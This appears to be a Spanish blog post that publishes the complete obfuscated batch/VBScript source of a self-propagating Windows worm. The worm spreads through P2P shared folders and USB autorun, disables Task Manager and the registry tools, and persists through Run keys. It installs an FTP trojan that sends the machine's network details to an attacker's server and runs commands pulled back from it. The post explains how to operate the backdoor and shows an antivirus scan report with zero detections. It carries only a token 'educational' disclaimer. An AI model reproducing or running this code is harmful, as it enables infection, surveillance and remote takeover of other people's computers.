Ejecutando comandos remotamente:
El troyano al infectar una maquina envia al servidor FTP un archivo del formato:
%username%at%userdomain%_ipcfg.t
conteniendo la salida del comando 'ipconfig/all'.
Para ejecutar un comando el esa PC basta con crear un archivo del formato:
%username%at%userdomain%_cmd.t
conteniendo el/los comandos a ejecutar, si se ejecuto correctamente, el archivo "%username%at%userdomain%_cmd.t" sera eliminado automaticamente del servidor.
:: 1l1l3l5.a // lil %ini%
:: Autor: lShadowl %ini%
:: SO Objetivo/Target OS: Windows Xp Pro %ini%
:: Propagation: P2P/rar, flash drives (it stay resident looking for new drives to infect) %ini%
:: Propagacion: P2P/rar, flash drives (queda residente en la memoria esperando que nuevos dispositivos se conecten para infectarlos) %ini%
:: Polimorfism: translocation, string morphing, 90-180 bytes added per every run %ini%
:: Polimorfismo: translocacion de codigo, mutacion de cadenas, 90-180 bytes mas cada ves que es ejecutado %ini%
:: Payload: Drops a FTP troyan that allows attacker to execute remote commands and scripts %ini%
:: Payload: Carga un troyano que le permite al atacante ejecutar comandos y scripts de manera remota via FTP %ini%
:: Fecha de creacion/Realese Date: 24/9/09 %ini%
:: Disclaimer: %ini%
:: This script contains malicious code. %ini%
:: Possessing, using, spreading, compiling and linking it, possessing, using and spreading %ini%
:: of the executable form of this script is illegal and it is forbidden in many countries. %ini%
:: Should you do such a thing, the author may not be held responsible for any damage that %ini%
:: occurred from the use of this source code. The actual purpose of this source code is for %ini%
:: educational purposes and as an object of study. This source code comes as is and the author %ini%
:: can not be held responsible for the existence of other modified variants of this code. %ini%
@%systemdrive% %ini%
@set sdjf=fictsoehnda %ini%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
@%agnvl%mys=%windir%\system32\sysio\lil.bat %ini%
@%egnkv%off %ini%
%agnvl: =%local enabledelayedexpansion %ini%
@md %windir%\system32\sysio >nul %ini%
if not exist %mys% ( @copy /y %0 %mys% >nul %ini%
attrib +h %mys%) %ini%
call:_%1 %2 %ini%
exit %ini%
:_ %ini%
call:_h432crt perp %ini%
exit %ini%
:_mut %ini%
%fsdhf%"ini"<%mys%>%windir%\system32\sysio\$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%fsdhf%"m%r: =%"<%windir%\system32\sysio\$>nul&&(goto:tst) %ini%
%fsdhf%"m%r: =%"<%mys%>>%windir%\system32\sysio\$ %ini%
%agnvl%/a rdnmm=%random%*9999999 %ini%
%egnkv%::%rdnmm% %%m%r: =%%%>>%windir%\system32\sysio\$ %ini%
:tst %ini%
%agnvl%a=1 %ini%
for /L %%a in (0,1,9) do call:cmp %%a %ini%
%egnkv%%a%|%fsdhf: =%str /C:"o" >nul&&(goto:rnd_b) %ini%
attrib -h %mys% %ini%
type %windir%\system32\sysio\$>%mys% %ini%
ping -n 2 localhost>nul %ini%
attrib +h %mys% %ini%
del /f /q %windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%dfjalds=createobject("scripting.filesystemobject")>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%kdflekj=dfjalds.opentextfile("%mys%",1)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%askdajs=kdflekj.readall>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%kdflekj.close>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%Randomize>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%ahqiaohe=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%jdfasuu=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%dwudhqw=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%asdwdkw=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%sjdfhjs=Replace(askdajs,"sdjf",ahqiaohe)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%lasdaod=Replace(sjdfhjs,"agnvl",jdfasuu)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%skdnmxi=Replace(lasdaod,"egnkv",dwudhqw)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%sjsabwu=Replace(skdnmxi,"fsdhf",asdwdkw)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%skdjawuj=dfjalds.opentextfile("%mys%",2)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%skdjawuj.write sjsabwu>>%windir%\system32\sysio\asjdhau.vbs %ini%
start %windir%\system32\sysio\asjdhau.vbs %ini%
del /f /q %windir%\system32\sysio\h432.vbs,%windir%\system32\sysio\$&& exit %ini%
:_h432crt %m5%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")>%windir%\system32\sysio\h432.vbs %m5%
%egnkv%xect.run "cmd /c %mys%%1", vbhide>>%windir%\system32\sysio\h432.vbs&& start %windir%\system32\sysio\h432.vbs&& goto :eof %m5%
:cmp %m7%
%fsdhf%"m%1"<%windir%\system32\sysio\$>nul %m7%
if %errorlevel%==1 (%agnvl% a=%a%o %m7%
goto:eof) %m7%
%agnvl% a=%a%x %m7%
goto :EOF %m7%
:rnd %m6%
%agnvl%/a r=%random%%%10 %m6%
goto:eof %m6%
:_perp %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\%sdjf:~6,1%xplor%sdjf:~6,1%r" /v NoFol%sdjf:~9,1%%sdjf:~6,1%rOptions /t R%sdjf:~6,1%G_%sdjf:~9,1%WOR%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntv%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%T%sdjf:~10,1%skMgr /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%R%sdjf:~6,1%gistryTools /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lilUpdate /t REG_SZ /d %mys%/f %m1%
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AvUpdate /t REG_SZ /d %windir%\system32\sysio\h42.vbs /f %m1%
del /q %windir%\system32\sysio\t.rar %m1%
%systemdrive%&& set rc=1 %m1%
if exist "%programfiles%\WINRAR\WinRAR.exe" (set r="%programfiles%\WINRAR\WinRAR.exe" %m1%
%r% a -ibck -y %windir%\system32\sysio\t.rar %mys: =% %m1%
if not %errorlevel%==9009 set rc=0) %m1%
for %%a in ("%userprofile%\Configuraci¢n local\Datos de programa\Ares\My Shared Folder\" "%userprofile%\Local Settings\Application Data\Ares\My Shared Folder\" "%programfiles%\eMule\Incoming\" "%programfiles%\Shareaza\Downloads\" "%programfiles%\BearShare\Shared\" "%programfiles%\LimeWire\Shared\") do (if exist "%%a" (cd "%%a" %m1%
for %%e in (*.rar) do (type !mys: =!>"%%~ne.bat" %m1%
ping -n 2 localhost >nul&& !r! a -ibck -y "%%e" "%%~ne.bat") %m1%
for %%g in ("XXX Photos" dvdrip glee "Keygen Constructor" wii psp "Keygen ALL" fringe surrogates "Nude Celebrities" "MSN hack codes" "Password list" "Activation tool" Windows7 "Windows 7 trucos" "Windows 7 tricks" "MSN Hack Tool" Photoshop "Photoshop CS4") do (type !mys: =!>%%g.bat %m1%
if !rc!==0 (ping -n 2 localhost>nul&& !r! a -ibck -y %%g.rar %%g.bat)))) %m1%
call:_h432crt fnid&& ping -n 12 localhost>nul %m1%
call:_h432crt dinfres&& ping -n 12 localhost>nul&& set ertr=9 %m1%
%fsdhf%"m%ertr: =%"<%mys%>%windir%\system32\sysio\fet.bat %m1%
ping -n 1 www.google.com>nul&&(if not exist %username%at%userdomain%_cmd.t ( %m1%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL"^)>%windir%\system32\sysio\h42.vbs %m1%
%egnkv%xect.run "cmd /c %windir%\system32\sysio\fet.bat", vbhide>>%windir%\system32\sysio\h42.vbs %m1%
%windir%\system32\sysio\h42.vbs)) %m1%
call:_h432crt mut&& exit %m1%
:_dinfres %m2%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%%agnvl%kjslras=GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%("Select*From __InstanceOperationEvent Within 10 Where " _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%^& "TargetInstance isa 'Win32_LogicalDisk'")>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Do While True>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%%agnvl%asdaiw=kjslras.NextEvent>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%If asdaiw.TargetInstance.DriveType=2 _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Or asdaiw.TargetInstance.DriveType=3 Then>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Select Case asdaiw.Path_.Class>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Case "__InstanceCreationEvent">>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%wscript.sleep 2000>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%xect.run "cmd /c %mys%ddetc " ^& asdaiw.TargetInstance.DeviceId ^& " 1", vbhide>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%End Select>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%End If>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Loop>>%windir%\system32\sysio\ubsh.vbs %m2%
taskkill /f /im wscript.exe %m2%
start %windir%\system32\sysio\ubsh.vbs&& goto :eof %m2%
:_fnid %m4%
for %%i in (C: H: I: J: K: L: M: Z: Y: X: W: V: U: T: S: R: Q: P: O: N: G: F: E: D:) do (call:_ddetc %%i) %m4%
exit %m4%
:_ddetc %m4%
if exist %1 (fsutil fsinfo drivetype %1|findstr /C:"CD" >nul&& (>nul echo.)|| (if exist %1\%sdjf:~10,1%utorun.inf ( %m4%
for %%z in ("%1\%sdjf:~10,1%utorun.inf" "%1\lil.bat") do (%sdjf:~10,1%ttrib -h -r -s -a "%%z") %m4%
ren %1\%sdjf:~10,1%utorun.inf %random%ow.ned) %m4%
echo.exit|cmd/K prompt $_[%sdjf:~10,1%utorun]$_open=lil.bat$_shellexecute=lil.bat$_; >"%1\%sdjf:~10,1%utorun.inf" %m4%
type "%mys: =%">"%1\lil.bat" %m4%
for %%z in (%1\%sdjf:~10,1%utorun.inf %1\lil.bat %1\*.ned) do (%sdjf:~10,1%ttrib +h "%%z"))) %m4%
if %2'==' (goto:eof) else (exit) %m4%
@%systemdrive% %m9%
@set sdjf=fictsoehnda %m9%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %m9%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %m9%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %m9%
%agnvl: =%local enabledelayedexpansion %m9%
cd %windir%\system32\sysio %m9%
%agnvl%"target=%windir%\system32\sysio\" %m9%
ipconfig/all>%username%at%userdomain%_ipcfg.t %m9%
%egnkv: =%.exit|cmd/K prompt $_verbose$_open FTP.SERVER$_FTP.USER$_FTP.PASS$_cd FTP.TARGET.FOLDER$_verbose >$.t %m9%
%egnkv: =%.>mello.t&& call:r $.t exit ipcfgs.t %m9%
%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_put %username%at%userdomain%_ipcfg.t$_ls -lF$_verbose$_quit$_rem >>ipcfgs.t %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:ipcfgs.t %m9%
%egnkv: =%.>mello.t&& call:r $.t exit mello.t %m9%
%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_get %username%at%userdomain%_cmd.t$_ls -lF$_verbose$_quit$_rem >>mello.t %m9%
:floop %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:mello.t %m9%
if exist %username%at%userdomain%_cmd.t for /f "delims=" %%a in (%username%at%userdomain%_cmd.t) do (%agnvl%"rcmd=%%a" %m9%
if defined rcmd (cmd /c !rcmd! %m9%
if !errorlevel!==0 (%egnkv: =%.>"d.t"&& call:r $ exit "d.t" %m9%
%egnkv: =%.exit|cmd/K prompt $_delete !username!at!userdomain!_cmd.t$_ls -lF$_verbose$_quit$_rem >>"d.t" %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:"d.t">nul&& del /q !username!at!userdomain!_cmd.t))) %m9%
goto:floop %m9%
:r %m9%
for /f "tokens=1,* delims=]" %%A in ('"type %1|find /n /v """') do (%agnvl%"current=%%B" %m9%
if defined current (call %agnvl%current=!!current:%2=!!&& %egnkv%!current!>>%3) else %egnkv: =%.>>%3) %m9%
goto:eof %m9%
:: %m0%
:: %m8%
File Info
Report generated: 28.9.2009 at 19.25.46 (GMT 1)
Filename: 1l1l3l5.a.txt
File size: 11 KB
MD5 Hash: 7ab39a5929fa5dd09b38be6bd249fd4e
SHA1 Hash: 4492A228C7D2732DCACE25B2B73F3C6EEDC896CC
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23
Detections
a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -
Scan report generated by
NoVirusThanks.org
;D
0 comentarios:
Publicar un comentario